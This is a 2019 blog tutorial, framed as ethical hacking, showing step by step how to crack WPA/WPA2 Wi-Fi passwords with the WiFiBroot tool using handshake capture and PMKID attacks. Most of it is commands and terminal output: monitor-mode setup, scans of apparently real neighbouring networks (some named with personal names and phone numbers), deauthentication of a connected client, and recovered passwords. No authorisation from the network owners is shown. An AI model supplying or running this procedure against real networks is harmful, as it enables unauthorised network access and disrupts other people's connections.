Wednesday, 21 August 2019



There are many tools used to crack Wifi access points. Most of the Wifi authentication uses WPA/ WPA2 encryption to secure the Wifi networks. Still cracking password with WPA2 is mostly usable. According to ethical hacking researcher of international institute of cyber security still mostly users prefer to use WPA2 authentication for the Access Point security. We will show you to crack WPA/ WPA2 encryption with four way handshake & PMKID attack.


Four-way handshake is created so wireless client & access point can independently know PSK. Instead of telling the keys to each other they can transfer message in encryption from to each other. Four-way handshake is critical for protecting the PSK from infected access points. The four-way handshake is used to generate Pairwise Transient Key PTK keys.


PMKID is an unique identification used by Access Point to track down PMK which is being used for client. using this method attacker will directly communicate with the vulnerable access point, rather than capturing communication between Access point and clients.

Earlier also ethical hacking researcher of International institute of cyber security has demonstrated hack any wireless network.


  • For configuring Wireless interface. Connect your Wireless interface with Linux. Open terminal type iwconfig to check if the wireless interface is connected. Type airmon-ng check wlan0
  • Type airmon-ng start wlano
  • Type iwconfig to check if the wireless interface has started in monitor mode.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# iwconfig
 eth0      no wireless extensions.
 lo        no wireless extensions.
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:off


  • We will show how to crack four way handshake. For testing we will use Kali Linux 2019.1 amd64.
  • Make sure python3 is installed. For that type sudo apt-get update && sudo apt-get install python3 Then type sudo apt-get install python3-pip
  • Open terminal type git clone
  • Type cd WiFiBroot && ls
root@kali:/home/iicybersecurity/Downloads# git clone
 Cloning into 'WiFiBroot'…
 remote: Enumerating objects: 3, done.
 remote: Counting objects: 100% (3/3), done.
 remote: Compressing objects: 100% (3/3), done.
 remote: Total 276 (delta 0), reused 1 (delta 0), pack-reused 273
 Receiving objects: 100% (276/276), 504.20 KiB | 347.00 KiB/s, done.
 Resolving deltas: 100% (166/166), done.
 root@kali:/home/iicybersecurity/Downloads# cd WiFiBroot/
 root@kali:/home/iicybersecurity/Downloads/WiFiBroot# ls
 dicts          handshakes  LICENSE  utils      wireless
  • Type python
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python
 Traceback (most recent call last):
   File "", line 19, in 
     from wireless import Shifter
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/", line 3, in 
     from wireless.cracker import PSK
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/", line 6, in 
     from pbkdf2 import PBKDF2
 ImportError: No module named pbkdf2
  • If the above error encounters, type pip install pbkdf2
  • Then type python
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python -h
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
     $ python [--mode [modes]] [--options]
     $ python --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt
     #     Description                                 Value
     01    Capture 4-way handshake and crack MIC code    1
     02    Captures and Crack PMKID (PMKID Attack)       2
     03    Perform Manaul cracking on available
           capture types. See --list-types               3
     04    Deauthentication. Disconnect two stations
           and jam the traffic.                          4
 Use -h, --help after -m, --mode to get help on modes.


  • Type python –mode 1 –type handshake -i wlan0mon –verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
  • –mode 1 is used to crack four way handshake
  • -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL – WN722N V1
  • –verbose is used to print hash values.
  • -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
[*] Path: {/home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.

  NO  ESSID           PWR  ENC    CIPHER    AUTH      CH  BSSID              VENDOR      CL
----  ------------  -----  -----  --------  ------  ----  -----------------  --------  ----
   1  HATHWAY         -38  WPA2   CCMP      PSK       10  8C:E1:17:8D:5C:E4  zte          2
   2  ZTE-ae1e0e      -40  WPA2   CCMP      PSK        1  88:5D:FB:AE:1E:0E  zte          0
   3  MTNL_HOTSPOT    -78  WPA2   TKIP      PSK       11  0C:D2:B5:2C:55:5D  Binatone     1
   4  Neon`Sunny      -87  WPA2   TKIP      PSK        1  34:E3:80:41:F8:68  Genexis      0
   5  TP-LINK_D9D6    -87  WPA2   CCMP      PSK        1  98:DE:D0:A7:D9:D6  TP-LINK      0

  • Press Ctrl + C for stopping the scan. Here our target is MTNL_HOTSPOT
  • Enter 3 for cracking MTNL_HOTSPOT
 [] Changing Channel to 11 [SuccessFul] 
  • Enter n
[?] AP Clients [1] Scan Further?[Y/n] n 
[] Time Interval [15] -> Implies Gap b/w Frames is 15
  • Then it send de-authentication to the connected clients. Below shows one devices is connected with AP.
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication]
  • As the user will enter password in their own device. Wifibroot will capture the handshake & the password.
[+] Handshake 0CD2B52C555D (Binatone) [Captured]
[!] Handshake not saved. Use -w, --write for saving handshakes.
[^] Current Password: 29054367
[+] Found: 29054367
 [>] PMK:
 00000000:  74 0a ac 04 01 16 0c dd  73 fb 4e fa 50 17 18 7f  |t…….s.N.P…|
 00000010:  a1 c0 92 36 45 20 94 15  79 42 17 bb e2 21 5d 42  |…6E…yB…!]B|
 [>] PTK:
 00000000:  95 5f ee 82 ca c3 a2 b5  b1 a1 75 4a 11 a2 d8 05  |._……..uJ….|
 00000010:  49 08 62 ec 2b b9 e6 12  13 bd f8 53 7a 0d ce a0  |I.b.+……Sz…|
 00000020:  5c 4f d1 ca 04 32 4c bb  f4 6a 27 21 83 26 b3 ad  |\O…2L..j'!.&..|
 00000030:  84 42 fb e4 49 b7 e4 e2  65 03 58 d2 30 f2 35 cb  |.B..I…e.X.0.5.|
 [>] MIC:
 00000000:  da 86 9b 74 b7 d5 aa 67  2a 7d 78 aa 30 0e df e4  |…t…g*}x.0…|
 00000010:  29 9a d2 de                                       |)…|


  • Type python –mode 2 -i wlan0mon –verbose -d dicts/list.txt -w output.txt
  • –mode 2 is used capture & crack PMKID.
  • -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL – WN722N V1
  • –verbose is used to print hash values.
  • -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.
  • -w output.txt will save PMKID.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

[*] Path: {dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.
  • Press Ctrl + C for stopping the scan. Here our target is new_T03_T1
NO  ESSID                               PWR  ENC       CIPHER    AUTH      CH  BSSID              VENDOR      CL
 ----  --------------------------------  -----  --------  --------  ------  ----  -----------------  --------  ----
    1  Pankaj@9212458712                   -23  WPA2      CCMP      PSK        6  18:A6:F7:9B:27:DC  TP-LINK      0
    2  Cbi                                 -29  WPA2      CCMP      PSK        2  00:E0:4C:3B:37:08  REALTEK      0
    3  naidus                              -45  WPA       CCMP      PSK        2  C8:3A:35:0B:26:08  Tenda        0
    4  Lucky                               -47  WPA2      TKIP      PSK        1  54:B8:0A:07:82:D2  D-Link       0
    5  new_T03_T1                          -50  WPA2      TKIP      PSK       11  90:8D:78:F2:95:E3  D-Link       3
    6  DIRECT-28-HP DeskJet 2600 series    -59  WPA2      CCMP      PSK        6  B4:B6:86:65:DC:29  Hewlett      0
    7  Worldview@37                        -76  WPA2      CCMP      PSK        1  04:95:E6:A2:58:20  Tenda        0
    8  Sushil@WVC9312408388                -84  WPA       CCMP      PSK       11  0C:D2:B5:3D:0D:3C  Binatone     0
    9  Excitel                             -85  WPA2      CCMP      PSK        6  00:1E:A6:DB:B3:C0  Best         0
   10  Bunty                               -86  WPA2      CCMP      PSK        7  04:95:E6:87:AB:48  Tenda        0
   11  Excitel@43                          -86  WPA2/WPA  CCMP      PSK        7  C8:3A:35:46:BA:F8  Tenda        0
   12  Worldview@tanpreet                  -88  WPA2      TKIP      PSK       13  A0:AB:1B:D9:09:08  D-Link       0
  • Enter 5 for cracking new_T03_T1
[^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Open Authentication] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
 [^] 4 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Waiting…] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Initiated]
[^] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [1 of 4]
[~] Vulnerable to PMKID Attack!
[^] PMKID 908D78F295E3 (D-Link) [a31f70cc4ed5cabb67ae4d56f11ec0b6]
[+] PMKID -> [output.txt] [Saved]
[^] Currently Checking: accessme
[+] Password Found: accessme
[>] PMKID:
 00000000:  61 33 31 66 37 30 63 63  34 65 64 35 63 61 62 62  |a31f70cc4ed5cabb|
 00000010:  36 37 61 65 34 64 35 36  66 31 31 65 63 30 62 36  |67ae4d56f11ec0b6|
 [>] PMK:
 00000000:  93 89 96 03 d0 e8 ab bd  e8 8b f1 1b fb 8f 05 18  |…………….|
 00000010:  58 1e e3 cb 6d 2b ff 0d  b4 96 b4 fa 74 57 bd 77  |X…m+……tW.w|
  • Above shows target Access Point password.


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